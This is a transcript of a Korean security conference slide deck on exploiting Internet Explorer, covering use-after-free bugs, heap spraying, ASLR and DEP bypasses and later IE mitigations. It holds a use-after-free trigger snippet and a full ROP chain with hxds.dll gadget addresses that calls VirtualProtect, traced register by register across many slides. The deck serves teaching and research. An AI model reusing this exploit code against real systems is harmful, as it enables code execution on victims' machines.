하룻강아지가 Ie 무서운 줄 모른다
-
Upload
yoonho-kim -
Category
Software
-
view
541 -
download
10
description
Transcript of 하룻강아지가 Ie 무서운 줄 모른다
하룻강아지가IE 무서운 줄 모른다
김윤호(UknowY)
20140819_Inc0gnito
Who Am I?
• Hanyang University ICEWALL
• BoB 3rd
• ㅎㅎ Union
친한척
Why Browser?
• Hot – predominant desktop app.
• Effective – Tech shifting towards client side
• Complexity – lots of bugs
• $$$
Hot
Effective
Complexity
Complexity
Complexity – Rendering Engine
• HTML Parsing• CSS Parsing• Image Decoding• JavaScript Interpreter• Regular Expressions.• Document Object Model• Layout and Rendering.• SVG (Scalable Vector Graphics )• XML Parsing• XSLT (Extensible Stylesheet Language
Transformation )
Complexity – Browser Kernel
• Cookie Database• History Database• Password Database• Window Management• Location Bar• Safe Browsing Backlist• Network Stack• SSL / TLS Functionality• Disk Cache• Download Manager and Clipboard.
• Mozilla since 2004• t-shirt + $500 - $3,000
• Google since 2010• Typical security bugs $1,000-$5000• Possibility for bonus rewards (PoC, exploit,
awesomeness)
• Microsoft 2013 • IE11 preview (June 26 - July 26) : $500 -
$11,000• BlueHat Bonus for Defense : ~$50,000• Mitigation Bypass Bounty : ~$100,000
$$$
• CanSecWest 2014 with Zero Day Initiative, HP ...
• Browser• Google Chrome on Windows 8.1 x64: $100,000• Microsoft Internet Explorer 11 on Windows 8.1
x64: $100,000• Mozilla Firefox on Windows 8.1 x64: $50,000• Apple Safari on OS X Mavericks: $65,000
• “Exploit Unicorn” Grand Prize:• SYSTEM-level code execution on Windows 8.1
x64 on Internet Explorer 11 x64 with EMET(Enhanced Mitigation Experience Toolkit) bypass: $150,000*
Pwn2Own 2014 for $$$
올ㅋ
Internet explorer
CVE
Exploit Pack
Touch Sleeping Lion Coter
SW BugsBypass
ASLR/DEPExploit!
How to Damn it?
• mshtml.dll for HTML / Rendering
• DOM 관련 메모리 할당 및 관리
• jscript.dll for javascript
• Javascript 객체 관련 메모리 할당 및 관리
• jscript9.dll
• IE9 이상에서 대체된 jscript.dll
Where the Bugs?
• mshtml.dll for HTML / Rendering
• DOM 관련 메모리 할당 및 관리
• jscript.dll for javascript
• Javascript 객체 관련 메모리 할당 및 관리
• jscript9.dll
• IE9 이상에서 대체된 jscript.dll
Where the Bugs?
• msxml.dll for XML
• vgx.dll for VML
• Silverlight
• SWF
• ActiveX
pf) Java Applet
Where the Bugs?
VGX.dll Vuln. for VML (Vector Markup Language)
• Heap/Stack/Global buffer overflow
• Use-after-free
• Type Confusion
• Format String Bugs
• Race Condition
• ...
=> Memory Corruption Bugs!
What kind of Bugs?
• 말 그대로 free 되어 해제된 메모리를 다시사용하게 되면서 발생하는 취약점
• 최근 가장 Hot
• dangling pointer
• Heap Spray와 주로 함께 쓰임
Use After Free
<body><textarea id = “UknowY”> Hell Inc0gnito </textarea></body>
var e1 = document.getElementByTagName(“textarea”);var e2 = document.getElementById(“UknowY”)
e2.parentNode.removeChild(“UknowY”);
var S = new String(“\u3138\u3138”);for(var i=0; i<20000; i++) S += “\u3138\u3138”;e1.innerHtml = s;
vtable . . . . . .
textarea
vtable . . . . . .
textareae1
e2
xxxxxxxx xxxxxxxx xxxxxxxx
textareae1 e2 NULL
NULL
31383138 31383138 31383138
textareae1 e2 NULL
NULL
S
Use After Free
• CrossFuzz (2011)
• Nduja fuzzer (2012)
• NodeFuzz (2013)
• ClusterFuzz (2012)
• Smashing the Browser (Hitcon 2014)• https://github.com/demi6od/Smashing_The_Brows
er
How to get Bugs?
• Heap Spray[~IE7]
• Heap Feng Shui(HeapLib)[~IE8]
• Precise Heap Spray[~IE9]
Bypass ASLR
NOPS
Shellcode
NOPS
Shellcode
NOPS
Shellcode
NOPS
Shellcode
... < MORE > ...
EIP
Heap Spray
Heap Spray
Heap Structure
!peb
!heapdt _HEAP 0x00150000
dt _HEAP_SEGMENT 0x00150540
dt _HEAP_ENTRY 0x00240000
Heap Feng Shui / HeapLib
• 풍수지리학적으로 힙의 가장 좋은 지역에 빡
• 힙 스프레이랑 다르게 ‘정확히 계산해서 한 방에’빡
• HeapLib: 힙 스프레이와 관련된 Library를 구성
Heap Feng Shui / HeapLib
• IE8 ~ : DEP defaults
• NOP(\x90) is meaningless
• Nozzle/Bubble detect same content
• set stack with stack pivot
Precise Heap Spray
Precise Heap Spray
Precise Heap Spray
Spray Well
• ROP with non-ASLR Module
• ROP with third-party non-ASLR Module
• ROP with Memory Leak Vuln
Bypass DEP
Return Oriented Programming
• 메모리 영역 자체의 실행 권한을 변경• VirtualProtect(PAGE_READ_WRITE_EXECUTE)
• 현재 프로세스의 DEP 정책 자체를 변경• SetProcessDEPPolicy()
• NtSetInformationProcess()
• 새로운 메모리를 할당할 때, 실행 권한을 주고 쉘코드를복사• VirtualAlloc(MEM_COMMIT + PAGE_READWRITE_EXECUTE) +
copy memory
• HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc() + copy memory
• 쉘코드를 WX 가능한 영역에 복사한 뒤 실행• WriteProcessMemory()
• JRE 1.6.x
• Microsoft Office 2007/2010 - hxds.dll
• Skype4com protocol handler
• use RTF 0-day: MSCOMCTL.OCX
• mona.py (from Corelan)
• http://redmine.corelan.be/projects/mona
ROP with third-party Module
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX
ECX
EDX
EBX
ESP 0x0012120c
EBP
ESI
EDI
Return Oriented Programming
0xXXXXXXXX: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX
ECX
EDX
EBX
ESP 0x00121210
EBP
ESI
EDI
Return Oriented Programming
0x51c433d7: POP EAX 0x51c433d7: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX 0xXXXXX100
ECX
EDX
EBX
ESP 0x00121214
EBP
ESI
EDI
Return Oriented Programming
0x51c433d7: POP EAX 0x51c433d7: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX 0xXXXXX100
ECX
EDX
EBX
ESP 0x00121218
EBP
ESI
EDI
Return Oriented Programming
0x51c12345: XCHG EAX, ESP 0x51c12346: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX 0x00121218
ECX
EDX
EBX
ESP 0xXXXXX100
EBP
ESI
EDI
Return Oriented Programming
0x51c12345: XCHG EAX, ESP 0x51c12346: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x104
EBP
ESI
EDI
Return Oriented Programming
0x51be25dc: POP EDI0x51be25dd: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x108
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51be25dc: POP EDI 0x51be25dd: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x10c
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c3098e: MOV EAX,DWORD PTR DS:[EDI] 0x51c30990: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX VirtualProtect()
ECX
EDX
EBX
ESP 0x10c
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c3098e: MOV EAX,DWORD PTR DS:[EDI] 0x51c30990: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX VirtualProtect()
ECX
EDX
EBX
ESP 0x110
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c39987: XCHG EAX,ESI 0x51c39988: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x110
EBP
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c39987: XCHG EAX,ESI 0x51c39988: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x110 / 0x114
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX 0x00000201
ESP 0x118 / 0x11c
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX 0x00000040
EBX 0x00000201
ESP 0x120 / 0x124
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x128 / 0x12c
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x130 / 0x134
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x138 / 0x13c
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x140
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51c3f011, # RETN (ROP NOP) -> EDI
0x124: 0xXXXXXXXX, # VirtualProtect()->ESI
0x128: 0x51c4b2df, # & call esp -> EBP
0x12c: 0xXXXXX140, # 0x140 -> ESP
0x130: 0x00000201, # 0x00000201 -> EBX
0x134: 0x00000040, # 0x00000040 -> EDX
0x138: 0x51c5b991, # &Writable location -> ECX0x13c: 0x90909090, # Nop -> EAX
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x140
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
Return Oriented Programming
VirtualProtect(shellcode address,shellcode size,Permission,Writable location
);
ROP with non-ASLR Module Targeting
• get Information with User-Agent
• OS Type and Version
• Browser Type and Version
• Language
• Installed Module
ROP with non-ASLR Module Targeting
Play with Baby
Exploit-db (CVE-2012-4969)
SW Bug (UAF)
Bypass ASLR (Precise Heap Spray)
Bypass DEP (ROP)
으앙
• pointer information leakage
• catch Base Address of the Module with Memory Leak Vulnerability.
• make relative ROP!!
ROP with Memory Leak Vuln.
ROP with Memory Leak Vuln.
• DEPS (DOM Element Property Spray)
• HTML5 Spray
• VBscript or Jscript
• ActionScript
Advance Heap Spray
DEPS (DOM Element Property Spray)
CVE-2013-3893
• Canvas – full access to pixel data => Full memory control in consecutive heap pages.
• WebWorker – Thread! Fast!
HTML5 Spray
HTML5 Spray
HTML5 Spray
VBscript Heap Spray (cve-2013-3918)
VBscript Heap Spray (cve-2013-3918)
• use flash player for bypass DEP/ASLR
• <embed src=spray.swf allowScriptAccess="always" allowNetworking="all"TYPE="application/x-shockwave-flash" width="10" height="10">
• http://www.greyhathacker.net/?p=717
ActionScript Heap Spray
CVE-2014-0322
• GIFT (Got It From a Table)
• Vital Point Strike
• DVE
• ExpLib2
• Heap Feng Shui in jscript 9
Advanced Techniques
• Exploit “ASLR-free” zones
• SharedUserData @ 0x7ffe0000
• LdrHotPatchRoutine
GIFT (Got It From a Table)
GIFT (Got It From a Table)
• But, Windows 8 has already solved these problems
apply to CVE-2012-4969
Vital Point Strike
• Out-Of-Bounds Write
• array/vector object modification technique
(full process memory access)
• modify “SafetyOption” flag of the script engine
(to enable “God Mode”)
• run Active X (do anything)
Vital Point Strike
• http://www.secniu.com/how-to-use-vbscript-to-turn-on-the-god-mode/
• https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit
• http://www.secniu.com/the-art-of-leaks-the-return-of-heap-feng-shuidemo-code/
• http://blog.fortinet.com/post/advanced-exploit-techniques-attacking-the-ie-script-engine
• http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b
Advanced Techniques
ㅋ.ㅋ
But,
S/W BugsBypass
Mitigation
Bypass Sandbox
Exploit!
How to Damn it?
• DEP + ASLR + EMET(ASR, EAF+) + CFI
• VTguard
• Isolated Heap
• Sandbox
• https://twitter.com/defendtheworld(SecuInside 2014)
Latest Protect Method
VTguard
• great Defense against UAF
• do not share the same heap between
IE’s objects.
Isolated Heap
e2.parentNode.removeChild(“UknowY”);
var S = new String(“\u3138\u3138”);for(var i=0; i<20000; i++) S += “\u3138\u3138”;e1.innerHtml = s;
xxxxxxxx xxxxxxxx xxxxxxxx
textareae1 e2 NULL
NULL
31383138 31383138 31383138
textareae1 e2 NULL
NULL
S
Isolated Heap
Before
After
• HTML and SVG DOM Element
• CDOMTextNode
• CTextNodeMarkupPointer
• CMarkupPointer
• CTraversalNodeIterator
• CDomRange
IE Protected Mode (Sandbox)
• Bypass Enhanced Protected Mode
• Modify Registry Key
• Use COM Object
• Privilege Escalation
• Use Kernel Exploit
• ...
Bypass Sandbox
• http://conference.hitb.org/hitbsecconf2013kul/materials/D2T1%20-%20Mark%20Vincent%20Yason%20-%20Diving%20Into%20IE10's%20Enhanced%20Protected%20Mode%20Sandbox.pdf
• http://monsterz.kr/wp-content/uploads/2014/08/Newbies-Travels-To-Sandbox.pdf
• https://github.com/tyranid/IE11SandboxEscapes
